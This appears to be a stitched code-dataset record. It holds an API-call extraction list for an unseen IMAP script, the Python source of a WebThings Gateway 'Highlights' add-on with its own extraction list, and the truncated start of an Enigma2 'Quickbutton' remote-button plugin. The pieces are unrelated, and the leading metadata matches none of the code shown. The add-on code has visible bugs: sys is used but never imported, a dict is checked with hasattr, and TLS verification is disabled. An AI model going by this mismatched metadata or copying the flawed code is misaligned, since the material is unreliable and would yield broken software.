[((3359, 3379), 'os.chdir', 'os.chdir', (['"""Problems"""'], {}), "('Problems')\n", (3367, 3379), False, 'import os\n'), ((161, 190), 'imaplib.IMAP4_SSL', 'imaplib.IMAP4_SSL', (['host', 'port'], {}), '(host, port)\n', (178, 190), False, 'import imaplib\n'), ((1281, 1296), 'tqdm.tqdm', 'tqdm.tqdm', (['nums'], {}), '(nums)\n', (1290, 1296), False, 'import tqdm\n'), ((2169, 2190), 'os.mkdir', 'os.mkdir', (['folder_name'], {}), '(folder_name)\n', (2177, 2190), False, 'import os\n'), ((2203, 2224), 'os.chdir', 'os.chdir', (['folder_name'], {}), '(folder_name)\n', (2211, 2224), False, 'import os\n'), ((2238, 2265), 'os.system', 'os.system', (['f"""touch main.py"""'], {}), "(f'touch main.py')\n", (2247, 2265), False, 'import os\n'), ((2417, 2432), 'os.chdir', 'os.chdir', (['"""../"""'], {}), "('../')\n", (2425, 2432), False, 'import os\n'), ((2754, 2767), 'json.load', 'json.load', (['fp'], {}), '(fp)\n', (2763, 2767), False, 'import json\n'), ((2999, 3010), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3008, 3010), False, 'import os\n')]
|
"""Highlights API handler."""
import json
import os
import time
from time import sleep
import requests
import threading
try:
from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database
#print("succesfully loaded APIHandler and APIResponse from gateway_addon")
except:
print("Import APIHandler and APIResponse from gateway_addon failed. Use at least WebThings Gateway version 0.10")
sys.exit(1)
try:
from gateway_addon import Database
except:
print("Gateway python packages not loaded?!")
sys.exit(1)
class HighlightsAPIHandler(APIHandler):
"""Highlights API handler."""
def __init__(self, verbose=False):
"""Initialize the object."""
#print("INSIDE API HANDLER INIT")
self.addon_name = 'highlights'
self.running = True
self.server = 'http://127.0.0.1:8080'
self.DEV = True
self.DEBUG = False
self.things = [] # Holds all the things, updated via the API. Used to display a nicer thing name instead of the technical internal ID.
self.data_types_lookup_table = {}
self.token = None
# LOAD CONFIG
try:
self.add_from_config()
except Exception as ex:
print("Error loading config: " + str(ex))
self.DEBUG = True
# Get complete things dictionary via API
try:
self.things = self.api_get("/things")
#print("Did the things API call. Self.things is now:")
#print(str(self.things))
except Exception as ex:
print("Error getting updated things data via API: " + str(ex))
# Paths
# Get persistent data
try:
self.persistence_file_path = os.path.join(self.user_profile['dataDir'], self.addon_name, 'persistence.json')
except:
try:
print("setting persistence file path failed, will try older method.")
self.persistence_file_path = os.path.join(os.path.expanduser('~'), '.mozilla-iot', 'data', self.addon_name,'persistence.json')
except:
print("Double error making persistence file path")
self.persistence_file_path = "/home/pi/.mozilla/data/" + self.addon_name + "/persistence.json"
if self.DEBUG:
print("Current working directory: " + str(os.getcwd()))
first_run = False
try:
with open(self.persistence_file_path) as f:
self.persistent_data = json.load(f)
if self.DEBUG:
print("Persistence data was loaded succesfully.")
except:
first_run = True
print("Could not load persistent data (if you just installed the add-on then this is normal)")
self.persistent_data = {'items':[]}
if self.DEBUG:
print("Highlights self.persistent_data is now: " + str(self.persistent_data))
try:
self.adapter = HighlightsAdapter(self,verbose=False)
#self.manager_proxy.add_api_handler(self.extension)
#print("ADAPTER created")
except Exception as e:
print("Failed to start ADAPTER. Error: " + str(e))
# Is there user profile data?
#try:
# print(str(self.user_profile))
#except:
# print("no user profile data")
# Intiate extension addon API handler
try:
manifest_fname = os.path.join(
os.path.dirname(__file__),
'..',
'manifest.json'
)
with open(manifest_fname, 'rt') as f:
manifest = json.load(f)
APIHandler.__init__(self, manifest['id'])
self.manager_proxy.add_api_handler(self)
if self.DEBUG:
print("self.manager_proxy = " + str(self.manager_proxy))
print("Created new API HANDLER: " + str(manifest['id']))
except Exception as e:
print("Failed to init UX extension API handler: " + str(e))
# Respond to gateway version
try:
if self.DEBUG:
print(self.gateway_version)
except:
print("self.gateway_version did not exist")
# Start the internal clock
print("Starting the internal clock")
try:
t = threading.Thread(target=self.clock)
t.daemon = True
t.start()
except:
print("Error starting the clock thread")
# Read the settings from the add-on settings page
def add_from_config(self):
"""Attempt to read config data."""
try:
database = Database(self.addon_name)
if not database.open():
print("Could not open settings database")
return
config = database.load_config()
database.close()
except:
print("Error! Failed to open settings database.")
if not config:
print("Error loading config from database")
return
# Api token
try:
if 'Authorization token' in config:
self.token = str(config['Authorization token'])
print("-Authorization token is present in the config data.")
except:
print("Error loading api token from settings")
if 'Debugging' in config:
self.DEBUG = bool(config['Debugging'])
if self.DEBUG:
print("-Debugging preference was in config: " + str(self.DEBUG))
#
# CLOCK
#
def clock(self):
""" Runs every second """
while self.running:
time.sleep(1)
try:
for item in self.persistent_data['items']:
#print(str(item))
if 'thing1' in item and 'property1' in item and 'thing1_atype' in item and 'property1_atype' in item and 'enabled' in item:
if bool(item['enabled']) == False:
continue
api_get_result = self.api_get( '/things/' + str(item['thing1']) + '/properties/' + str(item['property1']))
#print("api_get_result = " + str(api_get_result))
try:
key = list(api_get_result.keys())[0]
except:
print("error parsing the returned json")
#continue
try:
if key == "errorx":
if api_get_result[key] == 500:
print("API GET failed (500 - thing not currently connected)")
#pass
#return
else:
#print("API GET was succesfull")
original_value = api_get_result[key]
if self.DEBUG:
print("got this original value from API: " + str(original_value))
if original_value is "" or original_value is None:
#print("original value is an empty string.") # this happens if the gateway has just been rebooted, and the property doesn not have a value yet.
continue
if 'previous_value' not in item:
item['previous_value'] = None
try:
if str(item['previous_value']) != str(original_value):
#print("new value")
#print("get_devices = " + str(self.adapter.get_devices()))
targetDevice = self.adapter.get_device( "highlights-" + str(item['thing1']) + "-" + str(item['property1']) ) # targetDevice will be 'None' if it wasn't found.
if targetDevice == None:
if self.DEBUG:
print("target device did not exist yet: " + str(item['thing1']) )
# figure out optimal thing and property type
try:
#print("self.things = " + str(self.things))
for thing in self.things:
thing_id = str(thing['id'].rsplit('/', 1)[-1])
#print("__id: " + str(thing_id))
if str(item['thing1']) == thing_id:
#print("thing1 was thing_id at: " + str(thing_id))
#print("thing['properties'] = " + str(thing['properties']))
for thing_property_key in thing['properties']:
property_id = thing['properties'][thing_property_key]['links'][0]['href'].rsplit('/', 1)[-1]
if str(item['property1']) == property_id:
#print("full property: " + str(thing['properties'][thing_property_key]))
#print("___type: " + str(thing['properties'][thing_property_key]['type']))
#if '@type' in thing['properties'][thing_property_key]:
# print("___atype: " + str(thing['properties'][thing_property_key]['@type']))
clone_property = thing['properties'][thing_property_key].copy()
clone_property['@type'] = item['property1_atype']
if not clone_property['links'][0]['href'].startswith("/things/highlights-"):
new_href = clone_property['links'][0]['href'].replace("/things/","/things/highlights-")
clone_property['links'][0]['href'] = new_href
new_thing_title = "highlights " + str(item['thing1'])
if 'title' in thing:
new_thing_title = "highlights " + str(thing['title'])
elif 'label' in thing:
new_thing_title = "highlights " + str(thing['label'])
new_thing_id = "highlights-" + str(item['thing1']) + '-' + str(item['property1'])
device = HighlightsDevice(self, self.adapter, new_thing_id, new_thing_title, item['thing1_atype']) # note that it's wrapped in an array
self.adapter.handle_device_added(device)
targetDevice = self.adapter.get_device(new_thing_id)
if targetDevice != None:
if self.DEBUG:
print("Creating cloned property. It's original_value will be: " + str(original_value))
targetDevice.properties[ str(item['property1']) ] = HighlightsProperty(
targetDevice,
str(item['property1']),
clone_property,
original_value,
str(item['thing1']),
str(item['property1']) )
targetProperty = targetDevice.find_property( str(item['property1']) )
self.adapter.handle_device_added(device)
targetProperty.update(original_value)
targetDevice.notify_property_changed(targetProperty)
else:
print("Error: the target device was still None after just creating it.")
except Exception as ex:
print("Error creating new thing: " + str(ex))
try:
if targetDevice != None:
targetProperty = targetDevice.find_property( str(item['property1']) )
if targetProperty != None:
targetProperty.update(original_value)
else:
if self.DEBUG:
print("Error: missing property wasn't created?")
else:
if self.DEBUG:
print("Error: missing device wasn't created?")
except Exception as ex:
print("Error updating property: " + str(ex))
except Exception as ex:
print("Error finding and updating property: " + str(ex))
continue
except Exception as ex:
print("Error putting via API: " + str(ex))
except Exception as ex:
print("Clock error: " + str(ex))
#
# HANDLE REQUEST
#
def handle_request(self, request):
"""
Handle a new API request for this handler.
request -- APIRequest object
"""
try:
if request.method != 'POST':
return APIResponse(status=404)
if request.path == '/init' or request.path == '/update_items':
try:
if request.path == '/init':
if self.DEBUG:
print("Getting the initialisation data")
try:
state = 'ok'
# Check if a token is present
if self.token == None:
state = 'Error: missing API token. Please add one in settings.'
return APIResponse(
status=200,
content_type='application/json',
content=json.dumps({'state' : state, 'items' : self.persistent_data['items']}),
)
except Exception as ex:
print("Error getting init data: " + str(ex))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps({'state' : "Internal error: no thing data", 'items' : []}),
)
elif request.path == '/update_items':
try:
self.persistent_data['items'] = request.body['items']
#print("")
# Get all the things via the API.
try:
self.things = self.api_get("/things")
#print("Did the things API call")
except Exception as ex:
print("Error getting updated things data via API: " + str(ex))
# try to get the correct property type (integer/float)
try:
for item in self.persistent_data['items']:
#print("_item: " + str(item))
if 'thing1' in item and 'property1' in item:
try:
for thing in self.things:
thing_id = str(thing['id'].rsplit('/', 1)[-1])
if str(item['thing1']) == thing_id:
#print("__id SPOTTED: " + str(thing_id))
try:
#print("thing = " + str(thing))
potential_atype = None
#print("Thing = " + str(thing))
#if '@type' in thing:
try:
if hasattr(thing, '@type'):
#print("existing @type spotted in thing")
if len(thing['@type']) == 1:
potential_atype = str(thing['@type'][0])
except Exception as ex:
print("Error checking for @type in thing: " + str(ex))
#print("thing['properties'] = " + str(thing['properties']))
for thing_property_key in thing['properties']:
property_id = thing['properties'][thing_property_key]['links'][0]['href'].rsplit('/', 1)[-1]
if self.DEBUG:
print("property_id = " + str(property_id))
if str(item['property1']) == property_id:
try:
#print("full property: " + str(thing['properties'][thing_property_key]))
done = False
item['property1_type'] = str(thing['properties'][thing_property_key]['type'])
if '@type' in thing['properties'][thing_property_key]:
if potential_atype != None:
# Cloning a property that already has a capability
#print("___atype: " + str(thing['properties'][thing_property_key]['@type']))
item['thing1_atype'] = potential_atype
item['property1_atype'] = str(thing['properties'][thing_property_key]['@type'])
done = True
else:
atype = str(thing['properties'][thing_property_key]['@type'])
if atype == 'AlarmProperty':
item['thing1_atype'] = 'Alarm'
item['property1_atype'] = atype
done = True
elif atype == 'OpenProperty':
item['thing1_atype'] = 'DoorSensor'
item['property1_atype'] = atype
done = True
elif atype == 'LockedProperty':
item['thing1_atype'] = 'Lock'
item['property1_atype'] = atype
done = True
elif atype == 'MotionProperty':
item['thing1_atype'] = 'MotionSensor'
item['property1_atype'] = atype
done = True
#elif atype == 'BrightnessProperty': # doesn't work, creates a boolean
# item['thing1_atype'] = 'Light'
# item['property1_atype'] = atype
# done = True
# Todo: we could look up the corresponding thing @type if a property @type is provided.
if done == False:
# here we figure out a fitting capabiliy if the property doesn't have one yet. This is required for it to show up as the highlighted property.
if item['property1_type'] == 'number' or item['property1_type'] == 'integer':
item['property1_atype'] = 'LevelProperty'
item['thing1_atype'] = 'MultiLevelSensor'
if 'unit' in thing['properties'][thing_property_key]:
if thing['properties'][thing_property_key]['unit'].lower() == 'watt': # or thing['properties'][thing_property_key]['unit'].lower() == 'kwh':
if self.DEBUG:
print("spotted a kwh or watt")
# technically using kwh is wrong here. But hey, I want that icon!
item['property1_atype'] = 'InstantaneousPowerProperty'
item['thing1_atype'] = 'EnergyMonitor'
if item['property1_type'] == 'boolean':
item['property1_atype'] = 'OnOffProperty'
item['thing1_atype'] = 'OnOffSwitch'
if 'readOnly' in thing['properties'][thing_property_key]:
if bool(thing['properties'][thing_property_key]['readOnly']) == True:
item['property1_atype'] = 'BooleanProperty'
item['thing1_atype'] = 'BinarySensor'
if self.DEBUG:
print("item['thing1_atype'] has been deduced as: " + str(item['thing1_atype']))
print("item['property1_atype'] has been deduced as: " + str(item['property1_atype']))
except Exception as ex:
print("Error while analysing properties: " + str(ex))
except Exception as ex:
print("Error while checking for @type in thing: " + str(ex))
except Exception as ex:
print("Error while while looping over things: " + str(ex))
continue
except Exception as ex:
print("Error finding if property should be int or float: " + str(ex))
self.save_persistent_data()
return APIResponse(
status=200,
content_type='application/json',
content=json.dumps({'state' : 'ok'}),
)
except Exception as ex:
print("Error saving updated items: " + str(ex))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("Error updating items: " + str(ex)),
)
else:
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("API error"),
)
except Exception as ex:
print("Init issue: " + str(ex))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("Error in API handler"),
)
else:
return APIResponse(status=404)
except Exception as e:
print("Failed to handle UX extension API request: " + str(e))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("API Error"),
)
def unload(self):
self.running = False
if self.DEBUG:
print("Highlights api handler shutting down")
#def cancel_pairing(self):
# """Cancel the pairing process."""
# Get all the things via the API.
# try:
# self.things = self.api_get("/things")
# #print("Did the things API call")
# except Exception as ex:
# print("Error, couldn't load things at init: " + str(ex))
#
# API
#
def api_get(self, api_path):
"""Returns data from the WebThings Gateway API."""
if self.DEBUG:
print("GET PATH = " + str(api_path))
#print("GET TOKEN = " + str(self.token))
if self.token == None:
print("PLEASE ENTER YOUR AUTHORIZATION CODE IN THE SETTINGS PAGE")
return []
try:
r = requests.get(self.server + api_path, headers={
'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'Bearer ' + str(self.token),
}, verify=False, timeout=5)
#if self.DEBUG:
# print("API GET: " + str(r.status_code) + ", " + str(r.reason))
if r.status_code != 200:
if self.DEBUG:
print("API GET returned a status code that was not 200. It was: " + str(r.status_code))
return {"error": r.status_code}
else:
#if self.DEBUG:
# print("API get succesfull: " + str(r.text))
return json.loads(r.text)
except Exception as ex:
print("Error doing " + str(api_path) + " request/loading returned json: " + str(ex))
#return [] # or should this be {} ? Depends on the call perhaps.
return {"error": 500}
def api_put(self, api_path, json_dict):
"""Sends data to the WebThings Gateway API."""
if self.DEBUG:
print("PUT > api_path = " + str(api_path))
print("PUT > json dict = " + str(json_dict))
#print("PUT > self.server = " + str(self.server))
#print("PUT > self.token = " + str(self.token))
headers = {
'Accept': 'application/json',
'Authorization': 'Bearer {}'.format(self.token),
}
try:
r = requests.put(
self.server + api_path,
json=json_dict,
headers=headers,
verify=False,
timeout=3
)
#if self.DEBUG:
#print("API PUT: " + str(r.status_code) + ", " + str(r.reason))
if r.status_code != 200:
#if self.DEBUG:
# print("Error communicating: " + str(r.status_code))
return {"error": str(r.status_code)}
else:
if self.DEBUG:
print("API PUT response: " + str(r.text))
return json.loads(r.text)
except Exception as ex:
print("Error doing http request/loading returned json: " + str(ex))
#return {"error": "I could not connect to the web things gateway"}
#return [] # or should this be {} ? Depends on the call perhaps.
return {"error": 500}
#
# Delete a thing
#
def delete_thing(self, device_id):
if self.DEBUG:
print("Deleting a highlighted thing")
try:
for i in range(len(self.persistent_data['items'])):
if 'thing1' in self.persistent_data['items'][i]:
if str(device_id) == 'highlights-' + str(self.persistent_data['items'][i]['thing1']):
del self.persistent_data['items'][i]
self.save_persistent_data()
break
except Exception as ex:
print("Error removing highligh thing from persistence data: " + str(ex))
#
# SAVE TO PERSISTENCE
#
def save_persistent_data(self):
#if self.DEBUG:
print("Saving to persistence data store at path: " + str(self.persistence_file_path))
try:
if not os.path.isfile(self.persistence_file_path):
open(self.persistence_file_path, 'a').close()
if self.DEBUG:
print("Created an empty persistence file")
#else:
# if self.DEBUG:
# print("Persistence file existed. Will try to save to it.")
with open(self.persistence_file_path) as f:
if self.DEBUG:
print("saving persistent data: " + str(self.persistent_data))
json.dump( self.persistent_data, open( self.persistence_file_path, 'w+' ) )
return True
except Exception as ex:
print("Error: could not store data in persistent store: " + str(ex) )
return False
def get_int_or_float(v):
number_as_float = float(v)
number_as_int = int(number_as_float)
if number_as_float == number_as_int:
return number_as_int
else:
return float( int( number_as_float * 1000) / 1000)
#
# ADAPTER
#
class HighlightsAdapter(Adapter):
"""Adapter that can hold and manage things"""
def __init__(self, api_handler, verbose=False):
"""
Initialize the object.
verbose -- whether or not to enable verbose logging
"""
self.api_handler = api_handler
self.name = self.api_handler.addon_name #self.__class__.__name__
print("adapter name = " + self.name)
self.adapter_name = self.api_handler.addon_name #'Highlights-adapter'
Adapter.__init__(self, self.adapter_name, self.adapter_name, verbose=verbose)
self.DEBUG = self.api_handler.DEBUG
def remove_thing(self, device_id):
if self.DEBUG:
print("Removing highlight thing: " + str(device_id))
try:
self.api_handler.delete_thing(device_id)
obj = self.get_device(device_id)
self.handle_device_removed(obj) # Remove from device dictionary
except Exception as ex:
print("Could not remove thing from highligh adapter devices: " + str(ex))
#
# DEVICE
#
class HighlightsDevice(Device):
"""Highlight device type."""
def __init__(self, handler, adapter, device_name, device_title, device_type):
"""
Initialize the object.
adapter -- the Adapter managing this device
"""
Device.__init__(self, adapter, device_name)
#print("Creating Highlight thing")
self._id = device_name
self.id = device_name
self.adapter = adapter
self.handler = handler
self._type.append(device_type)
self.name = device_name
self.title = device_title
self.description = 'Highlight device'
#if self.adapter.DEBUG:
#print("Empty Highlight thing has been created. device_name = " + str(self.name))
#print("new thing's adapter = " + str(self.adapter))
#
# PROPERTY
#
class HighlightsProperty(Property):
"""Highlight property type."""
def __init__(self, device, name, description, value, original_thing_id, original_property_id):
Property.__init__(self, device, name, description)
self.original_thing_id = original_thing_id
self.original_property_id = original_property_id
self.device = device
self.name = name
self.title = name
self.description = description # dictionary
self.value = value
self.set_cached_value(value)
self.device.notify_property_changed(self)
def set_value(self, value):
#print("set_value is called on a Highlight property.")
#todo: call the API here using the provided endpoint, in order to sync the values.
try:
data_to_put = { str(self.original_property_id) : value }
#print("data_to_put = " + str(data_to_put))
api_put_result = self.device.handler.api_put( '/things/' + str(self.original_thing_id) + '/properties/' + str(self.original_property_id), data_to_put )
#print("api_put_result = " + str(api_put_result))
except Exception as ex:
print("property:set value:error: " + str(ex))
#pass
def update(self, value):
#print("highlight property -> update to: " + str(value))
#print("--prop details: " + str(self.title) + " - " + str(self.original_property_id))
#print("--pro device: " + str(self.device))
if value != self.value:
self.value = value
self.set_cached_value(value)
self.device.notify_property_changed(self)
|
[
"os.path.expanduser",
"threading.Thread",
"json.load",
"gateway_addon.Adapter.__init__",
"json.loads",
"os.getcwd",
"gateway_addon.APIHandler.__init__",
"gateway_addon.Device.__init__",
"os.path.dirname",
"json.dumps",
"time.sleep",
"os.path.isfile",
"gateway_addon.APIResponse",
"gateway_addon.Property.__init__",
"requests.put",
"os.path.join",
"gateway_addon.Database"
] |
[((37616, 37693), 'gateway_addon.Adapter.__init__', 'Adapter.__init__', (['self', 'self.adapter_name', 'self.adapter_name'], {'verbose': 'verbose'}), '(self, self.adapter_name, self.adapter_name, verbose=verbose)\n', (37632, 37693), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((38509, 38552), 'gateway_addon.Device.__init__', 'Device.__init__', (['self', 'adapter', 'device_name'], {}), '(self, adapter, device_name)\n', (38524, 38552), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((39265, 39315), 'gateway_addon.Property.__init__', 'Property.__init__', (['self', 'device', 'name', 'description'], {}), '(self, device, name, description)\n', (39282, 39315), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((1827, 1906), 'os.path.join', 'os.path.join', (["self.user_profile['dataDir']", 'self.addon_name', '"""persistence.json"""'], {}), "(self.user_profile['dataDir'], self.addon_name, 'persistence.json')\n", (1839, 1906), False, 'import os\n'), ((3908, 3949), 'gateway_addon.APIHandler.__init__', 'APIHandler.__init__', (['self', "manifest['id']"], {}), "(self, manifest['id'])\n", (3927, 3949), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((4628, 4663), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.clock'}), '(target=self.clock)\n', (4644, 4663), False, 'import threading\n'), ((4951, 4976), 'gateway_addon.Database', 'Database', (['self.addon_name'], {}), '(self.addon_name)\n', (4959, 4976), False, 'from gateway_addon import Database\n'), ((6021, 6034), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6031, 6034), False, 'import time\n'), ((34211, 34309), 'requests.put', 'requests.put', (['(self.server + api_path)'], {'json': 'json_dict', 'headers': 'headers', 'verify': '(False)', 'timeout': '(3)'}), '(self.server + api_path, json=json_dict, headers=headers,\n verify=False, timeout=3)\n', (34223, 34309), False, 'import requests\n'), ((2619, 2631), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2628, 2631), False, 'import json\n'), ((3709, 3734), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3724, 3734), False, 'import os\n'), ((3882, 3894), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3891, 3894), False, 'import json\n'), ((16952, 16975), 'gateway_addon.APIResponse', 'APIResponse', ([], {'status': '(404)'}), '(status=404)\n', (16963, 16975), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((31472, 31495), 'gateway_addon.APIResponse', 'APIResponse', ([], {'status': '(404)'}), '(status=404)\n', (31483, 31495), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((33404, 33422), 'json.loads', 'json.loads', (['r.text'], {}), '(r.text)\n', (33414, 33422), False, 'import json\n'), ((34834, 34852), 'json.loads', 'json.loads', (['r.text'], {}), '(r.text)\n', (34844, 34852), False, 'import json\n'), ((36037, 36079), 'os.path.isfile', 'os.path.isfile', (['self.persistence_file_path'], {}), '(self.persistence_file_path)\n', (36051, 36079), False, 'import os\n'), ((2084, 2107), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2102, 2107), False, 'import os\n'), ((2453, 2464), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2462, 2464), False, 'import os\n'), ((31751, 31774), 'json.dumps', 'json.dumps', (['"""API Error"""'], {}), "('API Error')\n", (31761, 31774), False, 'import json\n'), ((31352, 31386), 'json.dumps', 'json.dumps', (['"""Error in API handler"""'], {}), "('Error in API handler')\n", (31362, 31386), False, 'import json\n'), ((17775, 17843), 'json.dumps', 'json.dumps', (["{'state': state, 'items': self.persistent_data['items']}"], {}), "({'state': state, 'items': self.persistent_data['items']})\n", (17785, 17843), False, 'import json\n'), ((30994, 31017), 'json.dumps', 'json.dumps', (['"""API error"""'], {}), "('API error')\n", (31004, 31017), False, 'import json\n'), ((18195, 18262), 'json.dumps', 'json.dumps', (["{'state': 'Internal error: no thing data', 'items': []}"], {}), "({'state': 'Internal error: no thing data', 'items': []})\n", (18205, 18262), False, 'import json\n'), ((30303, 30330), 'json.dumps', 'json.dumps', (["{'state': 'ok'}"], {}), "({'state': 'ok'})\n", (30313, 30330), False, 'import json\n')]
|
# Quickbutton
#
# $Id$
#
# Coded by Dr.Best (c) 2009
# Support: www.dreambox-tools.info
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
from Screens.Screen import Screen
from Screens.ChannelSelection import ChannelSelection
from Plugins.Plugin import PluginDescriptor
from Components.ActionMap import ActionMap, HelpableActionMap
from Components.PluginComponent import plugins
from Plugins.Plugin import PluginDescriptor
from Components.ConfigList import ConfigList, ConfigListScreen
from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo
from Components.config import config
from Components.Button import Button
from Screens.MessageBox import MessageBox
# for localized messages
from . import _
config.plugins.Quickbutton = ConfigSubsection()
config.plugins.Quickbutton.overwritehbbtvredbutton = ConfigYesNo(default=False)
config.plugins.Quickbutton.red = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.red_b = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.green = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.yellow = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.blue = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
from Screens.InfoBarGenerics import InfoBarPlugins
baseInfoBarPlugins__init__ = None
ENABLE_RED_BUTTON = False
def getHBBTVInstalled():
try:
from Plugins.Extensions.HbbTV.HbbTV import HbbTV
return config.plugins.hbbtv.enabled.value
except ImportError:
return False
def autostart(reason, **kwargs):
global baseInfoBarPlugins__init__, ENABLE_RED_BUTTON
if "session" in kwargs:
session = kwargs["session"]
if baseInfoBarPlugins__init__ is None:
baseInfoBarPlugins__init__ = InfoBarPlugins.__init__
InfoBarPlugins.__init__ = InfoBarPlugins__init__
InfoBarPlugins.greenlong = greenlong
InfoBarPlugins.yellowlong = yellowlong
InfoBarPlugins.redlong = redlong
InfoBarPlugins.bluelong = bluelong
if config.misc.rcused.value != 1:
ENABLE_RED_BUTTON = True
InfoBarPlugins.red = red
def setup(session, **kwargs):
session.open(QuickbuttonSetup)
def Plugins(**kwargs):
list = [PluginDescriptor(where=PluginDescriptor.WHERE_SESSIONSTART, fnc=autostart)]
list.append(PluginDescriptor(name="Setup Quickbutton", description=_("setup for Quickbutton"), where=[PluginDescriptor.WHERE_PLUGINMENU], icon="setup_quickbutton.png", fnc=setup))
return list
def InfoBarPlugins__init__(self):
from Screens.InfoBarGenerics import InfoBarEPG
if isinstance(self, InfoBarEPG):
x = {"green_l": (self.greenlong, _("Assign plugin to long green key pressed")),
"yellow_l": (self.yellowlong, _("Assign plugin to long yellow key pressed")),
"red_l": (self.redlong, _("Assign plugin to long red key pressed")),
"blue_l": (self.bluelong, _("Assign plugin to long blue key pressed"))}
if ENABLE_RED_BUTTON:
x["red_b"] = (self.red, _("Assign plugin to red key pressed"))
hbbtvinstalled = getHBBTVInstalled()
if config.plugins.Quickbutton.overwritehbbtvredbutton.value and hbbtvinstalled:
self["HbbtvActions"].setEnabled(False)
self["QuickbuttonActions"] = HelpableActionMap(self, "QuickbuttonActions", x)
else:
InfoBarPlugins.__init__ = InfoBarPlugins.__init__
InfoBarPlugins.greenlong = None
InfoBarPlugins.yellowlong = None
InfoBarPlugins.redlong = None
InfoBarPlugins.bluelong = None
if ENABLE_RED_BUTTON:
InfoBarPlugins.red = None
baseInfoBarPlugins__init__(self)
def greenlong(self):
startPlugin(self, str(config.plugins.Quickbutton.green.value))
def yellowlong(self):
startPlugin(self, str(config.plugins.Quickbutton.yellow.value))
def redlong(self):
startPlugin(self, str(config.plugins.Quickbutton.red.value))
def bluelong(self):
startPlugin(self, str(config.plugins.Quickbutton.blue.value))
def red(self):
startPlugin(self, str(config.plugins.Quickbutton.red_b.value))
def startPlugin(self, pname):
msgText = _("Unknown Error")
no_plugin = True
if pname != _("Nothing"):
if pname == _("Single EPG"):
from Screens.InfoBarGenerics import InfoBarEPG
if isinstance(self, InfoBarEPG):
self.openSingleServiceEPG()
no_plugin = False
elif pname == _("Multi EPG"):
from Screens.InfoBarGenerics import InfoBarEPG
if isinstance(self, InfoBarEPG):
self.openMultiServiceEPG()
no_plugin = False
elif pname == _("MediaPlayer"):
try: # falls es nicht installiert ist
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception as e:
msgText = _("Error!\nError Text: %s" % e)
elif pname == _("Plugin browser"):
from Screens.PluginBrowser import PluginBrowser
self.session.open(PluginBrowser)
no_plugin = False
elif pname == _("switch 4:3 content display"):
ar = {"pillarbox": _("Pillarbox"),
"panscan": _("Pan&Scan"),
"scale": _("Just Scale")}
switch = {"pillarbox": "panscan", "panscan": "scale", "scale": "pillarbox"}
config.av.policy_43.value = switch[config.av.policy_43.value]
config.av.policy_43.save()
self.session.open(MessageBox, _("Display 4:3 content as") + " " + ar[config.av.policy_43.value], MessageBox.TYPE_INFO, timeout=3)
no_plugin = False
elif pname == _("Timer"):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
no_plugin = False
elif pname == _("HbbTV Applications"):
try:
from Plugins.Extensions.HbbTV.HbbTV import HbbTV
no_plugin = not config.plugins.hbbtv.enabled.value
except ImportError:
no_plugin = True
finally:
if not no_plugin:
hbbtv_instance = HbbTV.instance
if hbbtv_instance:
hbbtv_instance._showApplicationList()
else:
plugin = None
for p in plugins.getPlugins(where=[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]):
if pname == str(p.name):
plugin = p
if plugin is not None:
try:
self.runPlugin(plugin)
no_plugin = False
except Exception as e:
msgText = _("Error!\nError Text: %s" % e)
else:
msgText = _("Plugin not found!")
else:
msgText = _("No plugin assigned!")
if no_plugin:
self.session.open(MessageBox, msgText, MessageBox.TYPE_INFO)
class QuickbuttonSetup(ConfigListScreen, Screen):
skin = """
<screen position="center,center" size="550,400" title="Quickbutton Setup" >
<widget name="config" position="20,10" size="510,330" scrollbarMode="showOnDemand" />
<widget name="key_red" position="0,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<widget name="key_green" position="140,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<ePixmap name="red" pixmap="skin_default/buttons/red.png" position="0,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="green" pixmap="skin_default/buttons/green.png" position="140,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
</screen>"""
def __init__(self, session, args=None):
Screen.__init__(self, session)
self["key_red"] = Button(_("Cancel"))
self["key_green"] = Button(_("OK"))
self.entryguilist = []
